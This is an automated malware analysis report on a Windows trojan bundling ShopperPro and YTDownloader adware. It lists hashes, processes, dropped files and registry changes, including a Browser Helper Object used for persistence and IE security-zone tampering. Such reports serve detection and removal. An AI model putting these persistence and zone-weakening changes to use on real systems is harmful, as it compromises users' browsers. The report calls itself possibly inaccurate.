Gen.Variant.Mikey.11140_c6c5706dc5

by malwarelabrobot on June 20th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Mikey.11140 (B) (Emsisoft), Gen:Variant.Mikey.11140 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: c6c5706dc5e286e1c99a162827614067
SHA1: f0b1fe43f56e47c6bc502f2f062869a92c3cd531
SHA256: 63c70aeec749c78c246dee51316a18a5b6dbbf7d66fb6ebbcd48eaf904a95c37
SSDeep: 24576:i0S lwKn0kEjn862inLEc86O8qv9leAbUaDQH5WXsLs6DD90ru/jjTtLXVEjw:EKnUb8B2f86cgZ8sLs6f90ru7PtLXVEj
Size: 1430528 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Download Assistant
Created at: 2015-05-16 12:30:15
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

BROWSE~2.EXE:2880
ins_geforce.exe:3108
ShopperPro.exe:2168
BrowserHelper.exe:140
sc.exe:2584
sc.exe:2864
sc.exe:2252
ins_shopperpro.exe:832
net1.exe:2808
net1.exe:3028
%original file name%.exe:464
%original file name%.exe:2404
%original file name%.exe:2680
%original file name%.exe:2692
%original file name%.exe:2388
ns19.tmp:2196
net.exe:2972
net.exe:2748
regsvr32.exe:2224
ins_sense.exe:3272
setup.exe:2504
setup.exe:2104
Rripitpko.exe:3324
find.exe:2308
tcpsvcs.exe:2312
Dazifrnw.exe:3296

The Trojan injects its code into the following process(es):

YTDownloader.exe:2468

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ins_geforce.exe:3108 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\ocnhrp.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\zttbgqnw.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\Mllzbzxd.tmp (403320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\srlykcd.dll (2055 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\Dazifrnw.exe (4149303 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\Dazifrnw.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\ocnhrp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\Mllzbzxd.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\srlykcd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\zttbgqnw.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp (0 bytes)

The process ShopperPro.exe:2168 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (487 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (487 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (5 bytes)

The process ins_shopperpro.exe:832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\setup1.exe (77238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\setup.exe (860771 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp (85755 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1.tmp (0 bytes)

The process %original file name%.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_26625\ins_sense.exe (126699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_26625\ins_geforce.exe (135221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_26625\ins_shopperpro.exe (28971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_26625\bxsdk32.dll (2386 bytes)

The process ins_sense.exe:3272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\webpq.dll (2058 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\Rripitpko.exe (3925933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\Qjkrl.tmp (383232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\dafqxyyv.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\awmtbllb.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\dafqxyyv.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\Rripitpko.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\webpq.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\awmtbllb.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl12.tmp\Qjkrl.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg11.tmp (0 bytes)

The process setup.exe:2504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44429 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (48390 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\AccDownload.dll (9226 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11054 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\nsExec.dll (6 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4232 bytes)
%Program Files%\YTDownloader\Updater.exe (17865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10764 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\ns19.tmp (6 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Program Files%\Common Files\System\SysMenu.dll (15206 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20452 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Program Files%\YTDownloader\converter.exe (61479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp (4 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp\nsExec.dll (0 bytes)

The process setup.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp (158241 bytes)
%Program Files%\ShopperPro\Updater.exe (23936 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\AccDownload.dll (9320 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\nsProcess.dll (4 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\jsdrv.exe (100378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\MoreInfo.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\System.dll (11 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\ns8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\jsdrv.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\MoreInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv4.tmp (0 bytes)

The process Rripitpko.exe:3324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\tgexscxus.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\142359 (37493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\System.dll (784 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\1910 (8360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\wpnlqeoc.dll (5 bytes)
%WinDir%\Tasks\88328397-9b53-4507-979d-3bf6c5e6551d-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\dafqxyyv.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp (4 bytes)
%Program Files%\Sense\88328397-9b53-4507-979d-3bf6c5e6551d-5.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\olhpwwsc.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp (529484 bytes)
%Program Files%\Sense\utils.exe (60608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\jbnixm.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\awmtbllb.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\uvftlpm.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\olhpwwsc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\1910 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\tgexscxus.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\wpnlqeoc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\dafqxyyv.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\142359 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\jbnixm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\awmtbllb.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz18.tmp\uvftlpm.dll (0 bytes)

The process tcpsvcs.exe:2312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\setup1.exe (229796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspA.tmp (243453 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB.tmp\D1958.dll (0 bytes)

The process Dazifrnw.exe:3296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\ocnhrp.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\cealjwn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\447976 (38383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\kkemcrzt.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\enwkiwc.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\System.dll (784 bytes)
%Program Files%\Ge-Force\utils.exe (61614 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp (574653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\zttbgqnw.dll (14 bytes)
%Program Files%\Ge-Force\55db0f44-c101-47cd-8ede-099d17d7ae11-5.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\tqymkwqem.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\zqpzc.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\229635 (5656 bytes)
%WinDir%\Tasks\55db0f44-c101-47cd-8ede-099d17d7ae11-5.job (72 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\tqymkwqem.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\ocnhrp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\cealjwn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\447976 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\kkemcrzt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\enwkiwc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\zttbgqnw.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\zqpzc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj15.tmp\229635 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (0 bytes)

Registry activity

The process BROWSE~2.EXE:2880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 EA 3A 2A 42 81 DE 62 2B 24 D9 CC 5C A3 5B 2A"

The process ins_geforce.exe:3108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 7F C4 F7 78 5E D9 E5 91 30 45 64 22 AE E1 0E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process ShopperPro.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"ExeLocation" = "%Program Files%\ShopperPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtID" = "ojhagnahfpegocdhlopgljpaafeogmcc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\ShopperPro]
"CONFIGLOCATION" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKLM\SOFTWARE\ShopperPro\ExtraInfo]
"DBVersion" = "1.0.1.6"

[HKLM\SOFTWARE\ShopperPro]
"DBLocation" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"Aff" = "obrdc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\ShopperPro]
"Version" = "3.1.9588.1993"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtFile" = "ShopperPro.crx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E A9 CC C7 BA 51 69 D2 80 AF 61 75 5D AF E7 AC"

[HKLM\SOFTWARE\ShopperPro]
"UserId" = "99999999-9999-4bd6-97ff-f15d28801c02"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"NoExplore" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BrowserHelper.exe:140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 6E 69 76 3F 33 30 8A 21 22 CD C8 35 2F 87 78"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process sc.exe:2584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sc.exe:2864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sc.exe:2252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process ins_shopperpro.exe:832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 CA A2 78 B9 C9 F4 CA 34 B6 90 37 FF 05 11 25"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process net1.exe:2808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net1.exe:3028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""

[HKLM\SOFTWARE\YTDownloader\Success]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

